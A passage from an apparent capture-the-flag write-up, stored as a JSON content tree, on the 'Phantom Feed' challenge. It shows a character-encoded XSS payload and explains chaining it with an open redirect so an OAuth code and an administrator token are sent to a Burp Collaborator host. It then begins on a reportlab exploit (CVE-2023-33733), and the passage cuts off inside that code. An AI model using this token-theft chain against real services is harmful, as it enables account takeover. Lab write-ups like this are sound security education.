children":3564},{"style":918},[3565],{"type":37,"value":3488},{"type":32,"tag":78,"props":3567,"children":3568},{"style":471},[3569],{"type":37,"value":516},{"type":32,"tag":78,"props":3571,"children":3572},{"style":918},[3573],{"type":37,"value":3470},{"type":32,"tag":78,"props":3575,"chi
ldren":3576},{"style":471},[3577],{"type":37,"value":516},{"type":32,"tag":78,"props":3579,"children":3580},{"style":918},[3581],{"type":37,"value":3582},"32",{"type":32,"tag":78,"props":3584,"children":3585},{"style":471},[3586],{"type":37,"value":516},{"type":32,"tag":78,"props":3588,"children":3589},{"style":918},[3590],{"type":37,"value":3591},"61",{"type":32,"tag":78,"props":3593,"children":3594},{"style":471},[3595],{"type":37,"value":516},{"type":32,"tag":78,"props":3597,"children":3598},{"style":918},[3599],{"type":37,"value":3582},{"type":32,"tag":78,"props":3601,"children":3602},{"style":471},[3603],{"type":37,"value":516},{"type":32,"tag":78,"props":3605,"children":3606},{"style":918},[3607],{"type":37,"value":3608},"96",{"type":32,"tag":78,"props":3610,"children":3611},{"style":471},[3612],{"type":37,"value":516},{"type":32,"tag":78,"props":3614,"children":3615},{"style":918},[3616],{"type":37,"value":3617},"104",{"type":32,"tag":78,"props":3619,"children":3620},{"style":471},[3621],{"type":37,"value":516},{"type":32,"tag":78,"props":3623,"children":3624},{"style":918},[3625],{"type":37,"value":3549},{"type":32,"tag":78,"props":3627,"children":3628},{"style":471},[3629],{"type":37,"value":516},{"type":32,"tag":78,"props":3631,"children":3632},{"style":918},[3633],{"type":37,"value":3549},{"type":32,"tag":78,"props":3635,"children":3636},{"style":471},[3637],{"type":37,"value":516},{"type":32,"tag":78,"props":3639,"children":3640},{"style":918},[3641],{"type":37,"value":3642},"112",{"type":32,"tag":78,"props":3644,"children":3645},{"style":471},[3646],{"type":37,"value":516},{"type":32,"tag":78,"props":3648,"children":3649},{"style":918},[3650],{"type":37,"value":3651},"58",{"type":32,"tag":78,"props":3653,"children":3654},{"style":471},[3655],{"type":37,"value":516},{"type":32,"tag":78,"props":3657,"children":3658},{"style":918},[3659],{"type":37,"value":3660},"47",{"type":32,"tag":78,"props":3662,"children":3663},{"style":471},[3664],{"type":37,"value":
516},{"type":32,"tag":78,"props":3666,"children":3667},{"style":918},[3668],{"type":37,"value":3660},{"type":32,"tag":78,"props":3670,"children":3671},{"style":471},[3672],{"type":37,"value":516},{"type":32,"tag":78,"props":3674,"children":3675},{"style":918},[3676],{"type":37,"value":3514},{"type":32,"tag":78,"props":3678,"children":3679},{"style":471},[3680],{"type":37,"value":516},{"type":32,"tag":78,"props":3682,"children":3683},{"style":918},[3684],{"type":37,"value":3531},{"type":32,"tag":78,"props":3686,"children":3687},{"style":471},[3688],{"type":37,"value":516},{"type":32,"tag":78,"props":3690,"children":3691},{"style":918},[3692],{"type":37,"value":3693},"49",{"type":32,"tag":78,"props":3695,"children":3696},{"style":471},[3697],{"type":37,"value":516},{"type":32,"tag":78,"props":3699,"children":3700},{"style":918},[3701],{"type":37,"value":3540},{"type":32,"tag":78,"props":3703,"children":3704},{"style":471},[3705],{"type":37,"value":516},{"type":32,"tag":78,"props":3707,"children":3708},{"style":918},[3709],{"type":37,"value":3710},"122",{"type":32,"tag":78,"props":3712,"children":3713},{"style":471},[3714],{"type":37,"value":516},{"type":32,"tag":78,"props":3716,"children":3717},{"style":918},[3718],{"type":37,"value":3719},"118",{"type":32,"tag":78,"props":3721,"children":3722},{"style":471},[3723],{"type":37,"value":516},{"type":32,"tag":78,"props":3725,"children":3726},{"style":918},[3727],{"type":37,"value":3728},"52",{"type":32,"tag":78,"props":3730,"children":3731},{"style":471},[3732],{"type":37,"value":516},{"type":32,"tag":78,"props":3734,"children":3735},{"style":918},[3736],{"type":37,"value":3470},{"type":32,"tag":78,"props":3738,"children":3739},{"style":471},[3740],{"type":37,"value":516},{"type":32,"tag":78,"props":3742,"children":3743},{"style":918},[3744],{"type":37,"value":3745},"101",{"type":32,"tag":78,"props":3747,"children":3748},{"style":471},[3749],{"type":37,"value":516},{"type":32,"tag":78,"props":3751,"children":3752},{"style
":918},[3753],{"type":37,"value":3754},"57",{"type":32,"tag":78,"props":3756,"children":3757},{"style":471},[3758],{"type":37,"value":516},{"type":32,"tag":78,"props":3760,"children":3761},{"style":918},[3762],{"type":37,"value":3452},{"type":32,"tag":78,"props":3764,"children":3765},{"style":471},[3766],{"type":37,"value":516},{"type":32,"tag":78,"props":3768,"children":3769},{"style":918},[3770],{"type":37,"value":3452},{"type":32,"tag":78,"props":3772,"children":3773},{"style":471},[3774],{"type":37,"value":516},{"type":32,"tag":78,"props":3776,"children":3777},{"style":918},[3778],{"type":37,"value":3779},"120",{"type":32,"tag":78,"props":3781,"children":3782},{"style":471},[3783],{"type":37,"value":516},{"type":32,"tag":78,"props":3785,"children":3786},{"style":918},[3787],{"type":37,"value":3470},{"type":32,"tag":78,"props":3789,"children":3790},{"style":471},[3791],{"type":37,"value":516},{"type":32,"tag":78,"props":3793,"children":3794},{"style":918},[3795],{"type":37,"value":3796},"109",{"type":32,"tag":78,"props":3798,"children":3799},{"style":471},[3800],{"type":37,"value":516},{"type":32,"tag":78,"props":3802,"children":3803},{"style":918},[3804],{"type":37,"value":3805},"102",{"type":32,"tag":78,"props":3807,"children":3808},{"style":471},[3809],{"type":37,"value":516},{"type":32,"tag":78,"props":3811,"children":3812},{"style":918},[3813],{"type":37,"value":3779},{"type":32,"tag":78,"props":3815,"children":3816},{"style":471},[3817],{"type":37,"value":516},{"type":32,"tag":78,"props":3819,"children":3820},{"style":918},[3821],{"type":37,"value":3822},"50",{"type":32,"tag":78,"props":3824,"children":3825},{"style":471},[3826],{"type":37,"value":516},{"type":32,"tag":78,"props":3828,"children":3829},{"style":918},[3830],{"type":37,"value":3831},"98",{"type":32,"tag":78,"props":3833,"children":3834},{"style":471},[3835],{"type":37,"value":516},{"type":32,"tag":78,"props":3837,"children":3838},{"style":918},[3839],{"type":37,"value":3710},{"type":32,"tag":7
8,"props":3841,"children":3842},{"style":471},[3843],{"type":37,"value":516},{"type":32,"tag":78,"props":3845,"children":3846},{"style":918},[3847],{"type":37,"value":3452},{"type":32,"tag":78,"props":3849,"children":3850},{"style":471},[3851],{"type":37,"value":516},{"type":32,"tag":78,"props":3853,"children":3854},{"style":918},[3855],{"type":37,"value":3856},"54",{"type":32,"tag":78,"props":3858,"children":3859},{"style":471},[3860],{"type":37,"value":516},{"type":32,"tag":78,"props":3862,"children":3863},{"style":918},[3864],{"type":37,"value":3710},{"type":32,"tag":78,"props":3866,"children":3867},{"style":471},[3868],{"type":37,"value":516},{"type":32,"tag":78,"props":3870,"children":3871},{"style":918},[3872],{"type":37,"value":3479},{"type":32,"tag":78,"props":3874,"children":3875},{"style":471},[3876],{"type":37,"value":516},{"type":32,"tag":78,"props":3878,"children":3879},{"style":918},[3880],{"type":37,"value":3881},"106",{"type":32,"tag":78,"props":3883,"children":3884},{"style":471},[3885],{"type":37,"value":516},{"type":32,"tag":78,"props":3887,"children":3888},{"style":918},[3889],{"type":37,"value":3728},{"type":32,"tag":78,"props":3891,"children":3892},{"style":471},[3893],{"type":37,"value":516},{"type":32,"tag":78,"props":3895,"children":3896},{"style":918},[3897],{"type":37,"value":3642},{"type":32,"tag":78,"props":3899,"children":3900},{"style":471},[3901],{"type":37,"value":516},{"type":32,"tag":78,"props":3903,"children":3904},{"style":918},[3905],{"type":37,"value":3822},{"type":32,"tag":78,"props":3907,"children":3908},{"style":471},[3909],{"type":37,"value":516},{"type":32,"tag":78,"props":3911,"children":3912},{"style":918},[3913],{"type":37,"value":3479},{"type":32,"tag":78,"props":3915,"children":3916},{"style":471},[3917],{"type":37,"value":516},{"type":32,"tag":78,"props":3919,"children":3920},{"style":918},[3921],{"type":37,"value":3549},{"type":32,"tag":78,"props":3923,"children":3924},{"style":471},[3925],{"type":37,"value":516},{"
type":32,"tag":78,"props":3927,"children":3928},{"style":918},[3929],{"type":37,"value":3693},{"type":32,"tag":78,"props":3931,"children":3932},{"style":471},[3933],{"type":37,"value":516},{"type":32,"tag":78,"props":3935,"children":3936},{"style":918},[3937],{"type":37,"value":3461},{"type":32,"tag":78,"props":3939,"children":3940},{"style":471},[3941],{"type":37,"value":516},{"type":32,"tag":78,"props":3943,"children":3944},{"style":918},[3945],{"type":37,"value":3505},{"type":32,"tag":78,"props":3947,"children":3948},{"style":471},[3949],{"type":37,"value":516},{"type":32,"tag":78,"props":3951,"children":3952},{"style":918},[3953],{"type":37,"value":3488},{"type":32,"tag":78,"props":3955,"children":3956},{"style":471},[3957],{"type":37,"value":516},{"type":32,"tag":78,"props":3959,"children":3960},{"style":918},[3961],{"type":37,"value":3540},{"type":32,"tag":78,"props":3963,"children":3964},{"style":471},[3965],{"type":37,"value":516},{"type":32,"tag":78,"props":3967,"children":3968},{"style":918},[3969],{"type":37,"value":3970},"115",{"type":32,"tag":78,"props":3972,"children":3973},{"style":471},[3974],{"type":37,"value":516},{"type":32,"tag":78,"props":3976,"children":3977},{"style":918},[3978],{"type":37,"value":3549},{"type":32,"tag":78,"props":3980,"children":3981},{"style":471},[3982],{"type":37,"value":516},{"type":32,"tag":78,"props":3984,"children":3985},{"style":918},[3986],{"type":37,"value":3461},{"type":32,"tag":78,"props":3988,"children":3989},{"style":471},[3990],{"type":37,"value":516},{"type":32,"tag":78,"props":3992,"children":3993},{"style":918},[3994],{"type":37,"value":3805},{"type":32,"tag":78,"props":3996,"children":3997},{"style":471},[3998],{"type":37,"value":516},{"type":32,"tag":78,"props":4000,"children":4001},{"style":918},[4002],{"type":37,"value":4003},"121",{"type":32,"tag":78,"props":4005,"children":4006},{"style":471},[4007],{"type":37,"value":516},{"type":32,"tag":78,"props":4009,"children":4010},{"style":918},[4011],{"type":3
7,"value":3505},{"type":32,"tag":78,"props":4013,"children":4014},{"style":471},[4015],{"type":37,"value":516},{"type":32,"tag":78,"props":4017,"children":4018},{"style":918},[4019],{"type":37,"value":3531},{"type":32,"tag":78,"props":4021,"children":4022},{"style":471},[4023],{"type":37,"value":516},{"type":32,"tag":78,"props":4025,"children":4026},{"style":918},[4027],{"type":37,"value":3488},{"type":32,"tag":78,"props":4029,"children":4030},{"style":471},[4031],{"type":37,"value":516},{"type":32,"tag":78,"props":4033,"children":4034},{"style":918},[4035],{"type":37,"value":3796},{"type":32,"tag":78,"props":4037,"children":4038},{"style":471},[4039],{"type":37,"value":516},{"type":32,"tag":78,"props":4041,"children":4042},{"style":918},[4043],{"type":37,"value":3660},{"type":32,"tag":78,"props":4045,"children":4046},{"style":471},[4047],{"type":37,"value":516},{"type":32,"tag":78,"props":4049,"children":4050},{"style":918},[4051],{"type":37,"value":4052},"63",{"type":32,"tag":78,"props":4054,"children":4055},{"style":471},[4056],{"type":37,"value":516},{"type":32,"tag":78,"props":4058,"children":4059},{"style":918},[4060],{"type":37,"value":3831},{"type":32,"tag":78,"props":4062,"children":4063},{"style":471},[4064],{"type":37,"value":516},{"type":32,"tag":78,"props":4066,"children":4067},{"style":918},[4068],{"type":37,"value":3488},{"type":32,"tag":78,"props":4070,"children":4071},{"style":471},[4072],{"type":37,"value":516},{"type":32,"tag":78,"props":4074,"children":4075},{"style":918},[4076],{"type":37,"value":3479},{"type":32,"tag":78,"props":4078,"children":4079},{"style":471},[4080],{"type":37,"value":516},{"type":32,"tag":78,"props":4082,"children":4083},{"style":918},[4084],{"type":37,"value":4003},{"type":32,"tag":78,"props":4086,"children":4087},{"style":471},[4088],{"type":37,"value":516},{"type":32,"tag":78,"props":4090,"children":4091},{"style":918},[4092],{"type":37,"value":3591},{"type":32,"tag":78,"props":4094,"children":4095},{"style":471},[4096
],{"type":37,"value":516},{"type":32,"tag":78,"props":4098,"children":4099},{"style":918},[4100],{"type":37,"value":4101},"36",{"type":32,"tag":78,"props":4103,"children":4104},{"style":471},[4105],{"type":37,"value":516},{"type":32,"tag":78,"props":4107,"children":4108},{"style":918},[4109],{"type":37,"value":4110},"123",{"type":32,"tag":78,"props":4112,"children":4113},{"style":471},[4114],{"type":37,"value":516},{"type":32,"tag":78,"props":4116,"children":4117},{"style":918},[4118],{"type":37,"value":3831},{"type":32,"tag":78,"props":4120,"children":4121},{"style":471},[4122],{"type":37,"value":516},{"type":32,"tag":78,"props":4124,"children":4125},{"style":918},[4126],{"type":37,"value":3549},{"type":32,"tag":78,"props":4128,"children":4129},{"style":471},[4130],{"type":37,"value":516},{"type":32,"tag":78,"props":4132,"children":4133},{"style":918},[4134],{"type":37,"value":3488},{"type":32,"tag":78,"props":4136,"children":4137},{"style":471},[4138],{"type":37,"value":516},{"type":32,"tag":78,"props":4140,"children":4141},{"style":918},[4142],{"type":37,"value":3540},{"type":32,"tag":78,"props":4144,"children":4145},{"style":471},[4146],{"type":37,"value":516},{"type":32,"tag":78,"props":4148,"children":4149},{"style":918},[4150],{"type":37,"value":4151},"40",{"type":32,"tag":78,"props":4153,"children":4154},{"style":471},[4155],{"type":37,"value":516},{"type":32,"tag":78,"props":4157,"children":4158},{"style":918},[4159],{"type":37,"value":3479},{"type":32,"tag":78,"props":4161,"children":4162},{"style":471},[4163],{"type":37,"value":516},{"type":32,"tag":78,"props":4165,"children":4166},{"style":918},[4167],{"type":37,"value":3488},{"type":32,"tag":78,"props":4169,"children":4170},{"style":471},[4171],{"type":37,"value":516},{"type":32,"tag":78,"props":4173,"children":4174},{"style":918},[4175],{"type":37,"value":3531},{"type":32,"tag":78,"props":4177,"children":4178},{"style":471},[4179],{"type":37,"value":516},{"type":32,"tag":78,"props":4181,"children":4182
},{"style":918},[4183],{"type":37,"value":4184},"117",{"type":32,"tag":78,"props":4186,"children":4187},{"style":471},[4188],{"type":37,"value":516},{"type":32,"tag":78,"props":4190,"children":4191},{"style":918},[4192],{"type":37,"value":3796},{"type":32,"tag":78,"props":4194,"children":4195},{"style":471},[4196],{"type":37,"value":516},{"type":32,"tag":78,"props":4198,"children":4199},{"style":918},[4200],{"type":37,"value":3745},{"type":32,"tag":78,"props":4202,"children":4203},{"style":471},[4204],{"type":37,"value":516},{"type":32,"tag":78,"props":4206,"children":4207},{"style":918},[4208],{"type":37,"value":3470},{"type":32,"tag":78,"props":4210,"children":4211},{"style":471},[4212],{"type":37,"value":516},{"type":32,"tag":78,"props":4214,"children":4215},{"style":918},[4216],{"type":37,"value":3549},{"type":32,"tag":78,"props":4218,"children":4219},{"style":471},[4220],{"type":37,"value":516},{"type":32,"tag":78,"props":4222,"children":4223},{"style":918},[4224],{"type":37,"value":3505},{"type":32,"tag":78,"props":4226,"children":4227},{"style":471},[4228],{"type":37,"value":516},{"type":32,"tag":78,"props":4230,"children":4231},{"style":918},[4232],{"type":37,"value":3831},{"type":32,"tag":78,"props":4234,"children":4235},{"style":471},[4236],{"type":37,"value":516},{"type":32,"tag":78,"props":4238,"children":4239},{"style":918},[4240],{"type":37,"value":3488},{"type":32,"tag":78,"props":4242,"children":4243},{"style":471},[4244],{"type":37,"value":516},{"type":32,"tag":78,"props":4246,"children":4247},{"style":918},[4248],{"type":37,"value":3479},{"type":32,"tag":78,"props":4250,"children":4251},{"style":471},[4252],{"type":37,"value":516},{"type":32,"tag":78,"props":4254,"children":4255},{"style":918},[4256],{"type":37,"value":4003},{"type":32,"tag":78,"props":4258,"children":4259},{"style":471},[4260],{"type":37,"value":516},{"type":32,"tag":78,"props":4262,"children":4263},{"style":918},[4264],{"type":37,"value":3505},{"type":32,"tag":78,"props":4266,"ch
ildren":4267},{"style":471},[4268],{"type":37,"value":516},{"type":32,"tag":78,"props":4270,"children":4271},{"style":918},[4272],{"type":37,"value":3461},{"type":32,"tag":78,"props":4274,"children":4275},{"style":471},[4276],{"type":37,"value":516},{"type":32,"tag":78,"props":4278,"children":4279},{"style":918},[4280],{"type":37,"value":3470},{"type":32,"tag":78,"props":4282,"children":4283},{"style":471},[4284],{"type":37,"value":516},{"type":32,"tag":78,"props":4286,"children":4287},{"style":918},[4288],{"type":37,"value":3470},{"type":32,"tag":78,"props":4290,"children":4291},{"style":471},[4292],{"type":37,"value":516},{"type":32,"tag":78,"props":4294,"children":4295},{"style":918},[4296],{"type":37,"value":3745},{"type":32,"tag":78,"props":4298,"children":4299},{"style":471},[4300],{"type":37,"value":516},{"type":32,"tag":78,"props":4302,"children":4303},{"style":918},[4304],{"type":37,"value":4305},"114",{"type":32,"tag":78,"props":4307,"children":4308},{"style":471},[4309],{"type":37,"value":516},{"type":32,"tag":78,"props":4311,"children":4312},{"style":918},[4313],{"type":37,"value":4314},"72",{"type":32,"tag":78,"props":4316,"children":4317},{"style":471},[4318],{"type":37,"value":516},{"type":32,"tag":78,"props":4320,"children":4321},{"style":918},[4322],{"type":37,"value":4323},"84",{"type":32,"tag":78,"props":4325,"children":4326},{"style":471},[4327],{"type":37,"value":516},{"type":32,"tag":78,"props":4329,"children":4330},{"style":918},[4331],{"type":37,"value":4332},"77",{"type":32,"tag":78,"props":4334,"children":4335},{"style":471},[4336],{"type":37,"value":516},{"type":32,"tag":78,"props":4338,"children":4339},{"style":918},[4340],{"type":37,"value":4341},"76",{"type":32,"tag":78,"props":4343,"children":4344},{"style":471},[4345],{"type":37,"value":516},{"type":32,"tag":78,"props":4347,"children":4348},{"style":918},[4349],{"type":37,"value":4350},"41",{"type":32,"tag":78,"props":4352,"children":4353},{"style":471},[4354],{"type":37,"value":516},
{"type":32,"tag":78,"props":4356,"children":4357},{"style":918},[4358],{"type":37,"value":4359},"125",{"type":32,"tag":78,"props":4361,"children":4362},{"style":471},[4363],{"type":37,"value":516},{"type":32,"tag":78,"props":4365,"children":4366},{"style":918},[4367],{"type":37,"value":3608},{"type":32,"tag":78,"props":4369,"children":4370},{"style":471},[4371],{"type":37,"value":4372},"))",{"type":32,"tag":78,"props":4374,"children":4375},{"style":498},[4376],{"type":37,"value":3329},{"type":32,"tag":78,"props":4378,"children":4379},{"style":471},[4380],{"type":37,"value":3371},{"type":32,"tag":46,"props":4382,"children":4383},{},[4384],{"type":37,"value":4385},"So, now we have our openredirect vulnerability, our xss, just chain them together allowing us to retrieve the admin token from the service on port 4000.",{"type":32,"tag":258,"props":4387,"children":4389},{"id":4388},"oauth2code",[4390],{"type":37,"value":3118},{"type":32,"tag":46,"props":4392,"children":4393},{},[4394,4396,4402],{"type":37,"value":4395},"First, we call the bot by redirecting it to the oauth2/code route using the open redirect exploit. And we add the redirection_url parameters as our Burp Collaborator url. 
This allows us to retrieve the ",{"type":32,"tag":74,"props":4397,"children":4399},{"className":4398},[],[4400],{"type":37,"value":4401},"authorization_code",{"type":37,"value":4403}," parameter.",{"type":32,"tag":46,"props":4405,"children":4406},{},[4407],{"type":37,"value":4408},"You can find below the sent request:",{"type":32,"tag":52,"props":4410,"children":4412},{"imgSrc":4411},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1704320776/writeups/phantom-feed/request_get_code_oauth2.webp",[],{"type":32,"tag":46,"props":4414,"children":4415},{},[4416],{"type":37,"value":4417},"We can see:",{"type":32,"tag":290,"props":4419,"children":4420},{},[4421,4426,4438,4450],{"type":32,"tag":294,"props":4422,"children":4423},{},[4424],{"type":37,"value":4425},"In white, the HTTP headers of the request with the token of the user.",{"type":32,"tag":294,"props":4427,"children":4428},{},[4429,4431,4436],{"type":37,"value":4430},"In green, the exploitation of the open redirect that redirects the bot to the ",{"type":32,"tag":74,"props":4432,"children":4434},{"className":4433},[],[4435],{"type":37,"value":3214},{"type":37,"value":4437}," route.",{"type":32,"tag":294,"props":4439,"children":4440},{},[4441,4443,4448],{"type":37,"value":4442},"In blue, the ",{"type":32,"tag":74,"props":4444,"children":4446},{"className":4445},[],[4447],{"type":37,"value":3260},{"type":37,"value":4449}," parameter that includes the URL of our Burp Collaborator.",{"type":32,"tag":294,"props":4451,"children":4452},{},[4453],{"type":37,"value":4454},"In red, our XSS payload.",{"type":32,"tag":46,"props":4456,"children":4457},{},[4458,4460],{"type":37,"value":4459},"Here we note that our XSS payload is present but will actually be executed only in the next step. 
This payload is present because ",{"type":32,"tag":284,"props":4461,"children":4462},{},[4463,4465,4471,4473,4479],{"type":37,"value":4464},"it is imperative that the client_id and redirect_url parameters be identical during both calls (",{"type":32,"tag":74,"props":4466,"children":4468},{"className":4467},[],[4469],{"type":37,"value":4470},"/code",{"type":37,"value":4472}," and ",{"type":32,"tag":74,"props":4474,"children":4476},{"className":4475},[],[4477],{"type":37,"value":4478},"/token",{"type":37,"value":1036},{"type":32,"tag":46,"props":4481,"children":4482},{},[4483,4485,4490],{"type":37,"value":4484},"We can see below the response sent to our collaborator. We can get now the ",{"type":32,"tag":74,"props":4486,"children":4488},{"className":4487},[],[4489],{"type":37,"value":4401},{"type":37,"value":4491}," parameter is present in the response.",{"type":32,"tag":52,"props":4493,"children":4495},{"imgSrc":4494},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1704319319/writeups/phantom-feed/oauth_token_get_authorized_code.webp",[],{"type":32,"tag":258,"props":4497,"children":4499},{"id":4498},"oauth2token",[4500],{"type":37,"value":4501},"oauth2/token",{"type":32,"tag":46,"props":4503,"children":4504},{},[4505,4507,4513],{"type":37,"value":4506},"So now, we have our ",{"type":32,"tag":74,"props":4508,"children":4510},{"className":4509},[],[4511],{"type":37,"value":4512},"authorized_code",{"type":37,"value":4514}," which was sent back to us by our collaborator.",{"type":32,"tag":46,"props":4516,"children":4517},{},[4518,4520,4525,4527,4532],{"type":37,"value":4519},"The next step is to use the ",{"type":32,"tag":74,"props":4521,"children":4523},{"className":4522},[],[4524],{"type":37,"value":4512},{"type":37,"value":4526}," with a call to the ",{"type":32,"tag":74,"props":4528,"children":4530},{"className":4529},[],[4531],{"type":37,"value":3160},{"type":37,"value":4533}," route using the open redirect (as in the previous step). 
At this point, the bot will execute our XSS payload, which will return the body of the response. This body will contain the administrator's token.",{"type":32,"tag":46,"props":4535,"children":4536},{},[4537,4539,4544],{"type":37,"value":4538},"Only the ",{"type":32,"tag":74,"props":4540,"children":4542},{"className":4541},[],[4543],{"type":37,"value":4401},{"type":37,"value":4545}," parameter was added to the request.",{"type":32,"tag":52,"props":4547,"children":4549},{"imgSrc":4548},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1704321315/writeups/phantom-feed/request_get_token_admin_oauth2.webp",[],{"type":32,"tag":46,"props":4551,"children":4552},{},[4553],{"type":37,"value":4554},"We can see below the response sent to our collaborator.",{"type":32,"tag":52,"props":4556,"children":4558},{"imgSrc":4557},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1704319375/writeups/phantom-feed/oauth2_body_stealed.webp",[],{"type":32,"tag":46,"props":4560,"children":4561},{},[4562],{"type":37,"value":4563},"If we decode the JWT, we can see that the data part indeed carries the user \"administrator\", allowing us to proceed to the next step.",{"type":32,"tag":52,"props":4565,"children":4567},{"imgSrc":4566},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1704319406/writeups/phantom-feed/admin_token.webp",[],{"type":32,"tag":46,"props":4569,"children":4570},{},[4571],{"type":37,"value":4572},"On the following chapter, we will detail what is possible to do as an administrator.",{"type":32,"tag":39,"props":4574,"children":4576},{"id":4575},"exploit-reportlab-library-cve-2023-33733",[4577],{"type":37,"value":4578},"Exploit reportlab library (CVE-2023-33733)",{"type":32,"tag":46,"props":4580,"children":4581},{},[4582],{"type":37,"value":4583},"We now have an admin token that allows us to interact with the port 4000 service. 
If we take a closer look at the routes of this service, we can see that one route is particularly interesting:",{"type":32,"tag":63,"props":4585,"children":4586},{"lang":456},[4587],{"type":32,"tag":68,"props":4588,"children":4590},{"className":460,"code":4589,"language":456,"meta":7,"style":7},"@web.route(\"/orders/html\", methods = [\"POST\"])\n@admin_middleware\ndef orders_html():\n  color = request.form.get(\"color\")\n\n  if not color:\n    return response(\"No color\"), 400\n\n  db_session = Database()\n  orders = db_session.get_all_orders()\n  \n  if not orders:\n    return response(\"No orders placed\"), 200\n\n  orders_template = render_template(\"orders.html\", color=color)\n  \n  html2pdf = HTML2PDF()\n  pdf = html2pdf.convert(orders_template, orders)\n  \n  pdf.seek(0)\n  return send_file(pdf, as_attachment=True, download_name=\"orders.pdf\", mimetype=\"application/pdf\")\n",[4591],{"type":32,"tag":74,"props":4592,"children":4593},{"__ignoreMap":7},[4594,4662,4674,4690,4745,4752,4774,4812,4819,4840,4869,4876,4896,4932,4939,4992,4999,5020,5067,5074,5104],{"type":32,"tag":78,"props":4595,"children":4596},{"class":80,"line":81},[4597,4601,4605,4609,4613,4617,4621,4626,4630,4634,4638,4642,4646,4650,4654,4658],{"type":32,"tag":78,"props":4598,"children":4599},{"style":471},[4600],{"type":37,"value":474},{"type":32,"tag":78,"props":4602,"children":4603},{"style":477},[4604],{"type":37,"value":480},{"type":32,"tag":78,"props":4606,"children":4607},{"style":471},[4608],{"type":37,"value":485},{"type":32,"tag":78,"props":4610,"children":4611},{"style":477},[4612],{"type":37,"value":490},{"type":32,"tag":78,"props":4614,"children":4615},{"style":471},[4616],{"type":37,"value":495},{"type":32,"tag":78,"props":4618,"children":4619},{"style":498},[4620],{"type":37,"value":501},{"type":32,"tag":78,"props":4622,"children":4623},{"style":504},[4624],{"type":37,"value":4625},"/orders/html",{"type":32,"tag":78,"props":4627,"children":4628},{"style":498},[4629],{"type":37,
"value":501},{"type":32,"tag":78,"props":4631,"children":4632},{"style":471},[4633],{"type":37,"value":516},{"type":32,"tag":78,"props":4635,"children":4636},{"style":519},[4637],{"type":37,"value":522},{"type":32,"tag":78,"props":4639,"children":4640},{"style":471},[4641],{"type":37,"value":1265},{"type":32,"tag":78,"props":4643,"children":4644},{"style":471},[4645],{"type":37,"value":2421},{"type":32,"tag":78,"props":4647,"children":4648},{"style":498},[4649],{"type":37,"value":501},{"type":32,"tag":78,"props":4651,"children":4652},{"style":504},[4653],{"type":37,"value":554},{"type":32,"tag":78,"props":4655,"children":4656},{"style":498},[4657],{"type":37,"value":501},{"type":32,"tag":78,"props":4659,"children":4660},{"style":471},[4661],{"type":37,"value":563},{"type":32,"tag":78,"props":4663,"children":4664},{"class":80,"line":90},[4665,4669],{"type":32,"tag":78,"props":4666,"children":4667},{"style":471},[4668],{"type":37,"value":474},{"type":32,"tag":78,"props":4670,"children":4671},{"style":477},[4672],{"type":37,"value":4673},"admin_middleware\n",{"type":32,"tag":78,"props":4675,"children":4676},{"class":80,"line":99},[4677,4681,4686],{"type":32,"tag":78,"props":4678,"children":4679},{"style":569},[4680],{"type":37,"value":572},{"type":32,"tag":78,"props":4682,"children":4683},{"style":477},[4684],{"type":37,"value":4685}," orders_html",{"type":32,"tag":78,"props":4687,"children":4688},{"style":471},[4689],{"type":37,"value":582},{"type":32,"tag":78,"props":4691,"children":4692},{"class":80,"line":108},[4693,4698,4702,4707,4711,4716,4720,4724,4728,4732,4737,4741],{"type":32,"tag":78,"props":4694,"children":4695},{"style":607},[4696],{"type":37,"value":4697},"  color ",{"type":32,"tag":78,"props":4699,"children":4700},{"style":471},[4701],{"type":37,"value":624},{"type":32,"tag":78,"props":4703,"children":4704},{"style":607},[4705],{"type":37,"value":4706}," 
request",{"type":32,"tag":78,"props":4708,"children":4709},{"style":471},[4710],{"type":37,"value":485},{"type":32,"tag":78,"props":4712,"children":4713},{"style":607},[4714],{"type":37,"value":4715},"form",{"type":32,"tag":78,"props":4717,"children":4718},{"style":471},[4719],{"type":37,"value":485},{"type":32,"tag":78,"props":4721,"children":4722},{"style":607},[4723],{"type":37,"value":2494},{"type":32,"tag":78,"props":4725,"children":4726},{"style":471},[4727],{"type":37,"value":495},{"type":32,"tag":78,"props":4729,"children":4730},{"style":498},[4731],{"type":37,"value":501},{"type":32,"tag":78,"props":4733,"children":4734},{"style":504},[4735],{"type":37,"value":4736},"color",{"type":32,"tag":78,"props":4738,"children":4739},{"style":498},[4740],{"type":37,"value":501},{"type":32,"tag":78,"props":4742,"children":4743},{"style":471},[4744],{"type":37,"value":722},{"type":32,"tag":78,"props":4746,"children":4747},{"class":80,"line":117},[4748],{"type":32,"tag":78,"props":4749,"children":4750},{"emptyLinePlaceholder":157},[4751],{"type":37,"value":160},{"type":32,"tag":78,"props":4753,"children":4754},{"class":80,"line":126},[4755,4760,4765,4770],{"type":32,"tag":78,"props":4756,"children":4757},{"style":833},[4758],{"type":37,"value":4759},"  if",{"type":32,"tag":78,"props":4761,"children":4762},{"style":569},[4763],{"type":37,"value":4764}," not",{"type":32,"tag":78,"props":4766,"children":4767},{"style":607},[4768],{"type":37,"value":4769}," color",{"type":32,"tag":78,"props":4771,"children":4772},{"style":471},[4773],{"type":37,"value":1545},{"type":32,"tag":78,"props":4775,"children":4776},{"class":80,"line":135},[4777,4781,4786,4790,4794,4799,4803,4807],{"type":32,"tag":78,"props":4778,"children":4779},{"style":833},[4780],{"type":37,"value":1178},{"type":32,"tag":78,"props":4782,"children":4783},{"style":607},[4784],{"type":37,"value":4785}," 
